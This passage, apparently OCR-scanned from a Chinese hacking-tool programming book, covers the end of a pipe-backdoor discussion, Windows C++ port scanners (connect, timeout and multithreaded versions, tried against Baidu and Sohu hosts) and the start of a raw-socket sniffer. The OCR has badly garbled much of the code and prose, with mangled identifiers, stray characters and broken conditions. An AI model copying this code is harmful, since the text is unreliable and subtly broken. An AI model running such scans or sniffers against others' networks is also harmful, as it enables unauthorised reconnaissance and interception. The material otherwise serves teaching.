这 个 管道 后 面 是 一 个 简陋 的 管道 后 门 ， 但 是 基本 完成 了 远程 cmd 的 通信 。 不 过 ， 其 中 有 很 多 
问题 没有 解决 ， 比 如 当 远 程 用 户 输入 “exit” 命 令 后 ,管道 后 门 束 退出 了 ， 而 远程 用 户 的 命令 
控制 界面 就 无 任何 输出 了 。 当 然 ， 这 只 是 其 中 一 个 问题 而 已 ， 为 了 演示 所 需 的 管道 技术 ， 这 
里 就 不 去 完善 了 。 请 读者 自行 完善 该 后 门 中 的 其 他 问题 。 

管道 后 门 还 有 其 他 几 种 变形 的 形式 。 这 里 的 例子 中 使 用 了 两 个 管道 ， 分 别针 对 读 和 写 ， 
而 其 他 的 形式 还 有 单 管道 后 门 和 零 管 道 后 门 。 单 管道 后 门 的 原理 是 在 执行 cmd 时 直接 带 
参数 执行 ， 而 省 去 了 给 cmd 传递 命令 的 管道 。 零 管道 后 门 是 直接 将 emd 的 输入 输出 句柄 
替换 为 socket 句柄 。 当 然 ， 这 些 管道 后 门 同样 可 以 主动 连接 控制 端 ， 而 实现 反弹 端口 的 连 
接 形式 。 
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8.2 ”黑客 工具 编程 技术 剖 配 


黑客 工具 是 一 把 双 刃 剑 。 对 于 安全 技术 研究 人 员 来 说 ， 它 能 够 轻易 完成 安全 检测 ， 而 对 
于 心怀 歹 意 的 攻击 者 来 说 ， 它 却 能 给 攻击 者 的 攻击 指引 更 多 的 攻击 方向 ， 提 供 更 多 的 攻击 手 
段 。 本 节 介 绍 两 种 黑客 工具 的 编程 知识 ， 分 别 是 扫描 技术 和 嗅 探 技 术 。 

扫描 技术 和 嗅 探 技术 都 可 以 被 视 为 收集 被 攻击 者 信息 的 方式 。 扫 描 技 术 主 要 用 于 收集 一 
些 可 以 入 侵 被 攻击 者 系统 的 信息 ， 而 嗅 探 技术 则 可 以 直接 获取 一 些 被 攻击 者 的 隐私 或 机 密 的 
数据 。 


8.2.1 端口 扫描 技术 


端口 扫描 是 为 了 确定 主机 或 服务 器 开放 或 提供 了 哪些 服务 ， 然 后 根据 具体 的 服务 进行 相 
应 的 攻击 。 

1. 端口 号 

端口 分 为 两 种 类 型 ， 分 别 是 TCP 端口 和 UDP 端口 。TCP 和 UDP 使 用 16 位 的 长 度 来 标 
识 一 个 端口 号 ， 从 而 识别 通信 的 进程 。 

对 于 常见 的 服务 器 来 说 ， 每 个 服务 器 都 有 一 个 知名 的 端口 号 ， 比 如 FTP 服务 器 的 端口 号 
是 TCP 的 21 号 端口 ，Telnet 服务 器 的 端口 号 是 TCP 的 23 号 端口 ，MS SQL SERVER 的 端口 
号 是 TCP 的 1433 号 端口 等 。 在 前 面 学 习 网 络 程序 开发 时 知道 ， 所 有 的 服务 端 都 要 对 自己 已 
经 绑 定 (bind0) 的 端口 号 进行 监听 〈listen0)。 对 于 客户 端 ， 无 须 特别 指定 本 地 的 端口 就 可 
以 与 服务 器 进行 连接 。 
EDy 注 : 端口 号 的 16 位 的 长 度 指 的 是 二 进 制 的 16 位 ，16 位 的 二 进 制 可 以 表示 的 十 进 制 范 围 是 0~65 535, 也 

就 是 TCP 和 UDP 的 端口 号 各 有 65 536 个 。 


2. 简单 的 端口 扫描 程序 (TCP Connect) 

在 前 面 介绍 网 络 编程 的 基础 知识 时 ， 使 用 listen0) 函 数 对 服务 端的 某 个 TCP 端口 进行 监听 ， 
然后 使 用 accept0 函 数 等 待 客户 端的 连接 请 求 。 而 客户 端 则 使 用 connect() 函 数 进行 远程 连接 ， 
当 服 务 端的 accept() 函 数 接受 连接 请 求 后 ， 服 
务 器 和 客户 出 可 以 进行 通信 。 

通过 前 面 的 知识 很 容易 知道 ， 如 果 客 户 端 
使 用 connectO 函 数 连 接 服 务 器 端的 某 个 端口 ， 
对 方 的 端口 是 开放 、 处 于 监听 状态 的 ， 那 么 一 | 
般 就 会 连接 成 功 ， 反 之 则 不 会 连接 成 功 。 第 一 | 
个 端口 扫描 工具 就 是 使 用 connect0 函数 来 完 。 国 1 
成 。 打 开 VC6， 创 建 一 个 对 话 框 的 项 目 工程 ， ' 
的 关联 变量 的 定义 如 图 8-35 所 示 。 图 8-34 扫描 器 窗口 布局 
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TEFS 
ee Member Variables | Automation | AciveX Events | Class info | 
Class name: A Class.. a 
Oe 
ITCPConnectDig.h LATCPConnectDig.cpp Add Variable "| 
Control IDs: Type Member Delete Yariable 


CButton m_BinScan 本 
PUREGDTUTTRE | 
ClPAddressCtrl_ m IpAddr Bn | 
IDC LIST PORT CListBox i 


LE 





Cw ] cm | 


图 8-35 控件 关联 变量 定义 


窗口 上 有 一 个 IP 地 址 控件 ， 还 有 扫描 的 开始 端口 和 结束 端口 。 根 据 IP 地 址 逐个 去 连接 


开始 端口 到 结束 端口 之 间 的 每 一 个 端口 号 。 这 样 的 扫描 工作 是 一 个 重复 性 的 工作 ， 代 码 如 下 : 


void a ds 


/7 在 这 里 添加 处 理 程序 
m Btnscan.EnableWindow (FALSE); 
WSADATA wsaData; 
WSAStartup (MAKEWORD (2, 2), &wsaData); 


/7 _ IP 地址 

DWORD dwIipAddr = 0; 

// 开始 端口 、 结 束 端口 和 当前 端口 

WORD wStartPort = 0, wEndPort = 0Q0, wCurrPort = 0; 


// 得 到 IP 地址 

m_ IpAddr.GetAddress (dwIpAddr); 

// 得 到 开始 端口 号 和 结束 端口 号 

wStartPort = GetDlgltemInt (IDC EDIT]1, FALSE, FALSE); 
wEndPort = GetDlgIitemIint (IDC EDIT2, FALSE, FALSE); 


CTime starttime, endtimer 


// 获得 扫描 开始 时 间 


starttime = CTirme: :GetCurrentTimel(); 


// 逐个 连接 从 开始 端口 至 结束 端口 之 间 的 所 有 端口 
for ( wCurrPort = wStartPort; wCurrPort <= wEndPort; WwCurrPort ++ ) 
a 

SOCKET s = socket (PF _ INET, SOCK_STREAM, IPPROTO TCP); 


struct sockaddr in ServAddr; 

ServAddr.sin family = AF INET; 
ServAddr.sin addr.Ss un.S addr = htonl (dwIpAddr); 
ServAddr.sin port = htons (wCurrPort); 


// 连接 当前 端口 
if ( connect(s, (SOCKADDR*)&ServAddr, sizeof (SOCKADDR)) == 0 ) 
{ 

CString strPort; 

strPort.Format("[%d] is open", wCurrPport),; 

m ListPport,.AddSstring (strPort); 


妾 盐 广 将 而 其 只 汀 ”山名 
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closesocket (s); 
} 


// 获得 扫描 结束 时 间 


endtime = CTime::GetCurrentTime(); 


// 计算 开始 时 间 和 结束 时 间 的 差 值 

CTimeSpan 七 = endtime - starttime; 

CString str 

str. Format (" 耘 时 : %02d:%$02d:%02d", t.GetHours(), t.GetMinutes(), t.GetSeconds(})); 


nuistport Addetrung (Str); 
m BtnSscan.EnableWindow (TRUE); 


WSACleanup (); 
} 


编译 上 面 的 代码 , 就 可 以 体验 自己 打造 的 端口 扫描 工具 了 。 扫描 一 下 百度 的 端口 。 但 是 ， 
百度 的 IP 地 址 是 多 少 呢 ?这 里 还 不 知道 。 使 用 ping 命令 去 ping 百度 的 域名 ， 从 而 得 到 百度 
的 JP 地址。 

通过 ping 命令 看 到 ， 百 度 的 IP 地 址 为 123.125.114.114。 用 端口 扫描 器 进行 扫描 ， 结 
如 图 8-36 所 示 。 从 图 8-36 中 可 以 看 出 ， 只 扫描 了 百度 的 3 个 端口 ， 分 别 是 79 号 、80 号 和 
81 号 端口 ， 而 开放 的 端口 只 有 80 号 端口 。TCP 的 80 号 端口 是 Web 服务 的 端口 ， 也 就 是 说 
百度 开放 着 Web 服务 。 但 是 ， 端 口 扫 描 所 耗 的 时 间 竟 然 是 42s， 平 均一 个 端口 用 掉 了 14s 的 
时 间 ， 这 个 速度 太 慢 。 

换 搜狐 的 端口 扫描 一 下 ， 如 图 8-37 所 示 。 从 图 8-37 中 可 以 看 出 ， 同 样 扫 描 搜狐 的 3 个 
TCP 端口 ， 但 是 扫描 速度 快 了 很 多 ， 平 均一 个 端口 只 有 约 1s 的 时 间 。 即 使 一 个 端口 使 用 1 
秒 的 时 间 ， 假 如 要 扫描 65 535 个 端口 的 话 ，65 535s 的 时 间 也 是 无 法 接受 的 时 间 长 度 。 因 此 
有 必要 对 端口 扫描 进行 改造 。 





图 8-36 ”扫描 百度 端口 的 结果 图 8-37 扫描 搜狐 端口 的 结 9 


= 注 : 为 什么 扫描 百度 和 扫描 搜狐 的 速度 差异 如 此 之 大 呢 ? 通常 连 接 一 个 不 开放 的 端口 时 是 需要 一 定时 间 
的 ， 而 对 于 搜狐 而 言 ， 它 可 能 是 做 了 某 些 限 制 ， 从 而 在 连接 不 开放 端口 时 会 很 快 返回 ， 但 是 搜狐 是 如 何 做 
的 就 不 得 而 知 了 。 


3. 域名 转换 IP 地 址 
在 扫描 百度 和 搜狐 网 站 时 ， 总 是 使 用 ping 命令 先 获取 网 站 的 IP 地 址 。 如 果 每 次 都 要 先 





中 
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ping 后 才能 扫描 的 话 ， 那 太 繁琐 了 ， 频 繁 地 开 cmd 命令 行 控制 台 就 会 让 人 很 烦 。 因 此 ， 在 工 
有 具 中 增加 一 个 域名 转换 IP 地 址 的 功能 。 窗 口 修改 后 的 布局 如 图 8-38 所 示 。 

图 8-38 所 示 的 窗口 中 增加 了 一 个 文本 框 用 来 输入 域名 、 一 个 “转换 ”按钮 。 在 文本 框 中 
输入 要 转换 的 IP 地 址 的 域名 ， 然 后 单 击 “ 转 换 ” 按 钮 ， 转 换 好 的 人 P 地 址 直接 显示 在 IP 地 址 
编辑 框 中 。 转 换 的 效果 如 图 8-39 所 示 。 
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图 8-38 增加 了 域名 转换 IP 地 址 的 扫描 工具 图 8-39 域名 转换 功能 效果 
它 的 实现 代码 如 下 : 


void CTCPConnectDlg: :OnBtnTranslate() 


{ 
// 在 这 里 添加 处 理 程序 
WSADATA wsaData; 
WSAStartup (MAKEWORD (2, 2), g&wsaData); 


char szDnsName [MAXBYTE] = { 0 }; 
GetDlgItemText (IDC EDIT3, szDnsName, MAXBYTE); 


HOSTENT *pHostent; 
struct sockaddr in sAddr; 


PHostent = gethostbyname (szDnsName); 


if ( pHostent->h addr list[0] ) 

{ 
memepy (&sAddr.sin addr.s. addr, pHostent-—>h addr list[0], pHostent->h length); 
m_ IpAddr.SetAddress (ntohl (sAddr.sin_addr.S_un.Ss addr)); 

2 


else 


{ 
MessageBox ("转换 失败 ! 请 输入 正确 的 域名 ! "); 
下 


WSACleanup (); 
} 


以 上 代码 关键 的 只 有 一 句 ， 就 是 对 gethostbyname() 的 调用 。gethostbyname() 函 数 的 定义 如 下 : 


struct hostent FAR *gethostbyname (const char FAR *name}); 
该 函数 的 作用 是 返回 对 应 于 给 定 主机 名 的 主机 信息 。 该 函数 的 参数 是 char* 类 型 的 , 它 指 
向 主机 名 的 指针 。 返 回 值 的 类 型 是 hostent， 该 结构 体 的 定义 如 下 : 


struct hostent { 


CHar FAR * h name; 
char FAR * FAR * h aliases; 
short h addrtype; 
short h length; 


当 绀 全 将 沿革 啊 钼 册 o 商 
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char FAR * FAR * h addr list; 


] 7 

程序 中 用 到 了 其 中 的 最 后 两 个 参数 ，h_length 表示 的 是 地 址 的 长 度 ， 而 h_addr list 表示 
的 是 地 址 的 列表 。 只 要 将 h_addr list 中 的 内 容 读 取出 来 ， 即 可 得 到 指定 域名 的 IP 地 址 。 

4. 主机 存活 测试 (ICMP Scan) 

扫描 器 扫描 一 个 不 开放 的 端口 时 间 会 很 长 ， 应 为 使 用 的 connect0 函 数 默 认 是 阻塞 函数 。 
如 果 扫 描 一 个 网 络 上 根本 不 存在 的 主机 ， 那 么 同样 也 会 等 待 很 长 的 时 间 。 如 果 按 照 端 口 扫描 
器 不 确定 主机 是 否 在 线 ， 而 依次 连接 其 每 个 端口 ， 这 样 不 但 要 等 待 更 长 的 时 间 ， 而 且 一 无 所 
获 。 因 此 ， 在 扫描 目标 主机 端口 的 时 候 ， 要 先 判断 目标 主机 是 否 在 线 。 

如 何 判断 一 个 主机 是 否 在 线 呢 ?方法 很 简单 ， 就 是 ping 对 方 的 主机 地 址 。 如 果 ping 的 
时 候 ， 对 方 主机 有 应 答 ， 就 说 明 其 在 线 ; 如 果 返 回 超时 或 主机 无 法 到 达 ， 则 说 明 不 存在 该 主 
机 地 址 或 者 是 对 方 有 防火 墙 禁止 了 其 他 主机 的 ICMP 的 求情 回 显 。 

扫描 工具 也 利用 ping 的 原理 来 事先 判断 对 方 主机 是 否 在 线 、 是 否 有 必要 扫描 该 主机 (对 
方 不 在 线 或 者 有 防火 墙 的 话 ， 没 有 必要 扫描 )。 

关于 ping 的 实现 , 在 前 面 的 章节 已 经 完成 了 , 这 里 只 要 拿 来 使 用 即 可 。 实现 后 如 图 8-40 所 示 。 

在 扫描 目标 主机 以 前 ， 先 判断 其 是 否 在 线 ， 则 可 以 决定 是 否 要 进行 扫描 。 这 在 扫描 多 个 
IP 地 址 时 是 非常 有 用 的 。 

5. 设 定 延 时 扫描 

在 扫描 目标 主机 前 对 目标 主机 是 否 在 线 进 行 了 判断 ， 在 能 够 扫描 多 台 主 机 的 扫描 器 中 会 
大 大 提高 扫描 器 的 工作 效率 。 然 而 ， 这 样 做 对 于 真正 的 端口 扫描 并 不 能 起 太 大 的 作用 。 前 面 
提 到 ， 当 端口 不 开放 时 ，connentO) 函 数 等 待 的 时 间 是 非常 长 的 。 这 是 限制 扫描 速度 的 一 个 很 
关键 的 问题 。 如 果 给 connect() 函 数 设 定 一 个 超时 时 间 的 话 ， 就 可 以 真正 有 效 提高 扫描 的 速度 。 

在 介绍 如 何 给 connent() 函 数 设 定 超 时 时 间 前 ， 先 看 一 下 扫描 的 效果 ， 如 图 8-41 所 示 。 从 
图 8-41 中 可 以 看 出 ,对 192.168.0.252 这 个 他 地 址 中 1 一 2 000 的 端口 进行 扫描 , 扫描 完 2 000 个 
端口 所 用 的 时 间 是 31s， 开 放 的 端口 个 数 为 6， 相 比 起 前 面 的 扫描 速度 提升 了 很 多 。 

x TcPConnect , 












天 让 182 155 ，100 ，100 “| 减 名 地 址 : 
4 历 - A | 





端口 连接 延 时 0 /单位 为 之 秒 } 








图 8-40 对方 主机 不 在 线 图 8-41 给 connect0 设 定 超时 的 扫描 器 


修改 的 部 分 比较 少 ， 主 要 有 两 部 分 :一 部 分 是 设置 套 接 字 为 非 阻塞 模式 ， 另 一 部 分 是 查 


询 套 接 字 的 状态 。 主 要 来 查看 代码 ， 具 体 如 下 : 
/7 逐个 连接 从 开始 端口 至 结束 端口 之 间 的 所 有 端口 


for ( wCurrPort = wStartPort; wCurrPort <= wEndPort; wCurrPort ++ ) 
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SOCKET s = socket (PF INET, SOCK STREAM, IPPROTO. TCP); 


struct sockaddr in ServAddr:; 
ServAddr .sin family = AF_INET; 
ServAddr .sin addr.Ss un.Ss addr = htonl (dwIpAddr); 
ServAddr .sin port = htons(wCurrPort); 


TIMEVAL TimeOut; 
FD_ SET mask; 


unsigned long mode=1; // ioctlsocket 函数 的 最 后 一 个 参数 


// 获取 超时 时 间 
int nTimeOut = GetDlgItemIint (IDC EDIT SCAN TIME, FALSE, FALSE); 


TimeOut.tv sec = 0; 
// 设置 超时 毫秒 数 


TimeOut.tv Usec = nTimeOut; 


FD ZERO (gmask); 
FED SET(Ss, tmask); 


// 设置 为 非 阻塞 模式 


ioctlsocket(s, FIONBIO, &mode); 
connect(s, (struct sockaddr *)&ServAddr, sizeof (ServAddr)); 


// 查询 可 写 入 状态 
int ret = select(0, NULL, &mask, NULL, &TimeOut); 


if'( ret = 0 ER et l= 一人) 

{ 
CString strPort; 
strport Format(”[sd) is open”, WwCUrrPort); 
m ListPort.AddSstring (strPort); 

} 


closesocket (sS) 
} 


设置 套 接 字 为 非 阻塞 模式 的 函数 是 ioctlsocket()， 查询 套 接 字 状 态 的 函数 是 select()。 这 两 


个 函数 的 定义 分 别 如 下 。 
设置 套 接 字模 式 : 


int ioctlsocket (SOCKET s, long emd, u long FAR *argp); 


查询 套 接 字 状 态 : 
int select(int nfds, fa set FAR *readfds, fd set FRR *writefds, 
fd set FAR *exceptfds, const struct timeval FAR *timeout); 


6. 多 线程 扫描 技术 de MuitiPortScan 
这 是 关于 端口 扫描 的 最 后 一 个 话题 ， 从 前 面 | sm 
的 内 容 到 这 里 基本 上 是 逐步 完善 。 关 于 多 线程 的 











端口 扫描 ， 主 要 介绍 在 多 线程 环境 下 编写 端口 扫 
描 器 的 方法 ， 并 实现 一 个 简陋 的 多 线程 的 扫描 工 
有 具 。 软 件 的 界面 如 图 8-42 所 示 。 

编写 多 线程 程序 需要 注意 多 线程 的 同步 和 互 
斥 的 问题 。 所 谓 同步 ， 大 概 的 意思 就 是 某 一 事件 








完成 后 ， 才 能 继续 下 一 步 动 作 。 而 互 斥 就 是 同一 图 8.42 多 线程 扫 措 工具 


妆 莫 蛮 将 裔 滁 昱 湘 册 o 小 
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个 资源 不 能 有 多 个 线程 同时 去 操作 ， 只 能 依次 进行 操作 。Windows 下 常用 的 同步 和 互 斥 的 对 
象 有 临界 区 、 互 斥 量 、 信 号 量 和 事件 。 本 小 节 主 要 使 用 的 是 信号 量 和 事件 。 信 和 号 量 是 为 了 控 
制 一 个 具有 有 限 数 量 的 用 户 资源 而 设计 的 ; 事件 是 用 于 通知 线程 某 一 事件 已 经 发 生 ， 从 而 可 
以 启动 后 续 任 务 的 开始 。 

与 信号 量 相关 的 函数 ， 这 里 的 程序 中 会 用 到 两 个 ， 分 别 是 CreateSemaphoreO0 和 Release 
Semaphore()。 

CreateSemaphore(0 函 数 用 于 创建 一 个 信号 量 ， 其 定义 如 下 : 


HANDLE CreateSemaphore ( 
LPSECURITY ATTRIBUTES lpSemaphoreAttributes, // SD 


LONG linitialCount, // 初始 计数 
LONG lMaximumCount, // 最 大 计数 
LPCTSTR lpName // 对 象 名 


); 
ReleaseSemaphore() 函 数 用 于 释放 信号 量 ， 其 定义 如 下 : 


BOOL ReleaseSemaphore'!l 
HANDLE hsSemaphore, 7/ 信号 量 的 句柄 
LONG lReleaseCount, // 计数 递增 的 量 
RE lpPreviousCount ”// 前 一 个 计数 值 


汉 事件 相关 的 函数 ， 这 里 的 程序 中 会 用 到 3 个 ， 分 别 是 CreateEvent()、SetEvent() 和 


ResetEvent()。 
CreateEventO 函 数 用 于 创建 一 个 事件 ， 其 定义 如 下 : 


HANDLE CreateEVvent ( 
LPSECURITY ATTRIBUTES lpEventAttributes, // SD 


BOOL bManualReset; // 重 置 类 型 
BOOL pbInitialstate, // 初始 状态 
LPCTSTR lpName // 对 象 名 


SetEvent0 函数 用 于 设置 事件 处 于 有 信号 状态 ， 其 定义 如 下 : 


BOOL SetEvent( 
HANDLE hEvent  ”// 事件 的 句柄 


rm 数 用 于 设置 事件 为 无 信号 状态 ， 其 定义 如 下 ; 


BOOL ResetEVvent( 
HANDLE hEvent  ”// 事件 的 句柄 


)》 

信号 量 与 事件 都 需要 配合 WaitSingleObjectO 函 数 的 使 用 ， 该 函数 会 等 待 对 象 变 为 有 信 
号 才 继 续 ， 和 否则 会 进行 相应 的 等 待 〈 是 无 限制 等 待 ， 还 是 等 竺 一 段 时 间 ， 这 是 根据 代码 而 
定 的 )。 

程序 的 界面 根据 图 8-42 进行 布局 ， 然 后 设置 相应 的 控件 变量 ， 如 图 8-43 所 示 。 


CIPAddressctrl m_ipEnd 


CIPAddressCtrl _m_lpStart 
CTreectfl 





图 8-43 ”控件 对 应 的 变量 名 称 


单 击 “ 扫 描 ” 按 钮 后 ， 程 序 会 获取 开始 IP 地 址 、 结 束 P 地 址 、 开 始 端口 号 和 结束 端口 
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号 ， 然 后 将 相关 信息 送 入 扫描 的 主要 线程 中 ， 有 具体 代码 如 下 : 
void CMultiPortScanDlg: :OnBtnscan'() 
{ 
// TODO: Add your control notification handler code here 
DWORD dwStartIip, dwEndIip; 
WORD dwSstartPort, dwEndPort; 


// 得 到 开始 IP 地 址 和 端口 号 
m IpSstart.GetAddress (dwStartIp); 
m IpEnd. GetAddress (dwEndIip); 


dwStartPort = GetDlglItemIint (IDC PORTSTART, FALSE, FALSE); 
dwEndPort = GetDlgItemint (IDC PORTEND, FALSE, FALSE); 


// 创建 事件 
HANDLE hEvent = CreateEvent (NULL, TRUE, FALSE, NULL); 


// 填充 传 给 子 线程 的 参数 结构 体 

THREAD PARAM ThreadParam = { 0 }; 
ThreadParam.dwStartIip = dwSstart1ip; 
ThreadParam.dwEndIp = dwEndIp; 
ThreadParam.dwStartPort = dwStartPort; 
ThreadParam,.dwEndPort = dwEndPort; 
ThreadParam.pThis = this; 
ThreadParam,.hEvent = hEvent; 


// 创建 新 线程 并 等 待 参数 拷贝 完成 

HANDLE hThread = CreateThread (NULL, 0, MainThread, 
(LPVOID) tThreadParam, 
0 NULL); 

WaitForSingleObject (hEvent, INFINITE); 

ResetEvent (hEvent); 

CloseHandle (hEvent); 

CloseHandle (hThread); 


在 代码 中 ，THREAD PARAM 是 自 定义 的 结构 体 。 该 结构 体 是 给 扫描 的 主要 线程 传递 的 
参数 ， 其 定义 如 下 : 


typedef struct _THREAD PARAM 
{ 


DWORD dwStartIip; // 开始 IP 地 址 
DWORD dwEndIp; // 结束 IP 地址 

WORD dwSstartPort; /7 开始 端口 号 

WORD dGwEndPort; // 结束 端口 号 
CMultiPortScanDlg *pThis;  // 主 窗口 的 this 指针 
HANDLE hEvent; /7 事件 句柄 


}THREAD PARAM, *PTHREAD PARAM; 


扫描 的 主要 线程 MainThread0) 函 数 的 代码 如 下 : 


DWORD WINAPI CMultiPortScanDlg::MainThread(LPVOID lpParam) 


{ 
/1/ 拷贝 主线 程 传递 来 的 参数 
THREAD PARAM ThreadParam = { 0 }} 
MoveMemory (&ThreadParam, lpParam, sizeof (ThreadParam)); 
SetEvent (ThreadParam.hEvent); 


// 定义 传递 给 扫描 线程 的 结构 体 


SCAN_PARRARM ScanPararm = { 0 }; 


// 创建 事件 对 象 和 信号 量 对 象 

// 并 赋值 给 扫描 结构 体 

HANDLE hEvent = Createbvent (NULL, TRUE, FALSE, NULL); 

HANDLE hSemaphore = CreateSemaphore!(NULL, MAX THREAD, MAX THREAD, NULL); 


ScanParam.hEvent = hEvent; 
ScanParam.hSemaphore = hSemaphores 
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节 芷 空 将 前 涛 只 汀 


DWORD dwCurip; 
WORD dwCurPort; 


//- 外 层 循环 控制 IP 地 址 

for ( dwCurIp = ThreadParam.dwStartIp; 
dwCurIp <= ThreadParam.AdwEndIp; 
dwCurIp ++ ) 


// 添加 IP 地 址 到 树 形 控件 
sockaddr in sockaddr; 
sockaddr.sin addr.Ss un.s addr = ntohl (dwCurIp); 
HTREEITEMhTree= {( (CMultiPortScanDlg*)ThreadParam.pThis)->m IpTree.InsertItem 
(inet ntoalsockaddr.sin addr)); 
// 内 层 循环 控制 端口 号 
for ( dwCurPort = ThreadParam.dwStartPort; 
dwCurPort <= ThreadParam.dwEndPort; 
GwWCHTrPort ++ ) 


// 判断 信号 量 
DWORD dwWaitRet = WaitForSingleObject (hSemaphore, 200); 


if ( dwWaitRet == WAIT OBJECT 0 ) 

i 
ScanParam.dwIp = dwCurIp; 
Scanparam.GwPort = dwCurPort; 
ScanPparam.pThis = ThreadPparam.pThis; 

ScanParam.hTree = hTree; 


HANDLE hThread = CreateThread(NULL, 0, ScanThread, (LPVOID) &ScanParam, 
0, NULL); 

WaitForSingleObject (hEvent, TNFINITE); 

ResetEvent (hEvent)’; 


} 

else if ( dwWaitRet == WAIT TIMEOUT ) 
dwCurPport =~? 
continue; 


} 
return 0; 
} 
在 扫描 的 主要 线程 中 调用 了 具体 的 扫描 线程 ScanThread() 函 数 ， 并 为 其 传递 了 扫描 参数 
结构 体 SCAN PARAM。 该 结构 体 也 是 自 定义 的 结构 体 ， 其 定义 如 下 : 


typedef struct _SCAN PARAM 
{ 


DWORD dwIp; /1 _ IB 地 址 

WORD dwEort; // 端口 号 
CMultiportSscanDlg *pThis;  ”// 主 窗口 的 this 指针 
HANDLE hEvent， // 事件 句柄 

HANDLE hsSemaphore; /7 信号 量 句柄 
HTREEITEM hTree; // 树 形 控件 句柄 


}SCAN PARAM, *PSCAN PARAM; 
该 线程 同时 可 以 创建 MAX THREAD 个 进程 ， 这 是 在 定义 信号 量 时 设 定 的 。MAX THREAD 
是 自 定义 的 一 个 宏 ， 其 定义 如 下 : 


// 最 大 线程 数 ， 用 于 控制 信号 量 数量 
#define MAX THREAD 10 


具体 扫描 端口 的 线程 函数 ScanThread() 的 代码 如 下 : 


DWORD WINRPI CMultipPortScanDlg::ScanThread {LPVOID lpParam) 


// 拷贝 传递 来 的 扫描 参数 





中 
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SCAN PARAM Scanparam = { 0 }:; 

MoveMemory(&ScanParam, lpParam, sizeof {SCAN PARAM)); 
SetEvent (ScanParam,hEvent); 

WSADATA wsa; 

WSAStartup (MAKEWORD (2, 2), &wsa); 

SOCKET s = socket (PE _INET, SOCK STREAM, IPPROTO TCP); 


sockaddr in sockaddr; 


sockaddr.sin family = AF INET; 
sockaddr.sin addr.Ss un.s addr = htonl(ScanParam.GwIP) ， 
sockaddr.sin port = htons(ScanParam.dwPort); 


if ( cornect(s, (SOCKADDR*) &gsockaddr, sizeof (SOCKADDR)) == 0 ) 
{ 
// 开发 的 端口 添加 到 树 形 控件 中 
Cstring strPort; 
strPport.Format("%d", ‘ScanPparait. dwPort); 
((CMultiportScanDlg *)Scanparam.pThis)->m IpTree.InsertIitem(strPort, 1, 1, 
ScanPparam.hTree),; 
((CMultiPortScanDlg *)ScanParam.pThis)~->m IpTree.Invalidate (FALSE); 
} 


closesocket (s); 
WSACleanup(); 


// 释放 一 个 信号 量 


ReleaseSemaphore (ScanParam.hSemaphore, 1, NULL); 


return 07 


} 

这 个 端口 扫描 的 速度 并 不 是 很 快 。 虽 然 看 起 来 速度 稍微 有 点 改进 ， 但 是 仅仅 是 依赖 于 多 
线程 可 以 同时 扫描 多 个 端口 ， 而 端口 的 连接 依然 使 用 的 是 connect()， 这 样 就 限制 了 扫描 的 速 
度 。 将 前 面 的 判断 主机 是 否 在 线 加 入 该 程序 中 ， 会 大 大 提高 速度 ， 因 为 扫描 连续 的 卫 段 时 ， 
很 多 卫 地 址 是 不 一 定 在 线 的 , 就 更 没有 必要 去 逐个 扫描 它 的 端口 。 其 次 将 设置 套 接 字 为 非 阻 
塞 模式 的 ， 给 connectO 加 入 超时 机 制 ， 这 样 就 更 完美 了 。 

关于 端口 扫描 的 内 容 就 介绍 到 这 里 。 


8.2.2 ” 嗅 探 技术 的 实现 


嗅 探 器 可 以 神 不 知 鬼 不 觉 地 去 获得 局 域 网 中 用 户 访问 网 络 的 数据 ， 可 谓 是 隐藏 在 黑暗 中 
的 偷窥 者 。 嗅 探 技 术 可 以 分 为 主动 嗅 探 和 被 动 噢 探 。 主 动 噢 探 主要 是 依赖 ARP 欺骗 或 MAC 
欺骗 诱 导 被 攻击 者 将 数据 发 送 给 攻击 者 ;被 动 嗅 探 主要 是 将 网 卡 设置 为 混杂 模式 ， 然 后 接收 
通过 网 卡 的 所 有 数据 。 这 里 主要 介绍 被 动 噢 探 的 工作 方式 。 

1， 嗅 探 器 的 编写 思 

共享 方式 下 的 以 太 网 会 将 数据 发 送 给 同一 网 段 内 的 所 有 计算 机 网 卡 ， 接 收 到 数据 的 网 卡 
会 将 与 自己 MAC 地 址 不 匹配 的 数据 丢弃 。 因 为 共享 以 太 网 会 将 别人 的 数据 也 发 送 给 自己 计 
算 机 的 网 卡 ， 所 以 嗅 探 器 就 是 利用 共享 以 太 网 的 原理 进行 嗅 探 的 。 网 卡 可 以 工作 在 多 种 方式 
下 ， 当 网 卡 工作 在 混杂 模式 下 时 ， 可 接收 所 有 的 数据 而 不 丢弃 。 当 接收 到 数据 以 后 ， 就 需要 
自己 解析 IP 头 、TCP 头 、UDP 头等 信息 。 因 此 ， 开 发 一 个 嗅 探 器 的 简单 思路 就 是 改变 网 卡 
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的 工作 方式 为 混杂 模式 ， 并 解析 收 到 的 数据 包 。 


第 设置 网 卡 的 工作 方式 为 混杂 模式 ,该 功能 通过 ioctlsocket() 函 数 即 可 改变 。 该 函数 在 前 面 
章 已 经 介绍 过 了 ， 这 里 只 看 如 何 改变 即 可 ， 代 码 如 下 : 
/7 设置 SIO_RCVATLT 控制 代码 ， 以 便 接收 所 有 的 IP 包 
是 DWORD dwVvalue = 1; 
客 if( ioctlsocket (sRaw, SIO REVALL, &dwValue) = 0 ) 
编 : 全 蕊 届 E 一 下 
例 SIO RCVALL 定义 在 mstcpip.h 头 文件 中 ， 因 此 要 编译 它 ， 必 须 包含 该 头 文 件 及 库 文 件 ， 
六 | 代码 如 下 ; 


#include <mstcpip.h> 
#pragma comment (1ib, "Advapi32.1ib") 


| 为 了 收 到 数据 包 以 便 自己 解析 数据 包 ，, 就 要 使 用 原始 套 接 字 , 而 不 能 单纯 地 使 用 TCP 或 
UDP 套 接 字 。 对 于 解析 数据 包 ， 必 须 了 解 和 清楚 数据 包 的 格式 。 这 里 给 出 TCP 和 UDP 数据 
包 的 格式 ， 定 义 如 下 : 





typedef struct .TCPHeader /20 字 节 的 TCF 头 
USHORT sourcePort， // 16 位 源 端 口号 
USHORT qdestinationPort: // 16 位 目的 端口 号 
ULONG sequenceNumber; // 32 位 序列 号 
ULONG acknowledgeNumber; /7 32 位 确认 号 
UCHAR dataoffset; // 高 4 位 表示 数据 偏 移 
UCHAR flags; 4/4 6 位 标志 位 
USHORT winaowsy // 16 位 窗口 大 小 
USHORT checksum; // _ 16 位 校 验 和 
USHORT urgentPointer; // 16 位 紧急 数据 偏 移 量 





} TCPHeader, *PTCPHeader; 


typedefl struct' UDPEHeader 
{ 


USHORT SourcePort; // 源 端 口号 
USHORT destinationport; 1/ 目的 端 回 号 
USHORT len; // 封包 长 度 
USHORT checksum; /7 校 验 和 


} UDPHeader, *PUDPHeader; 
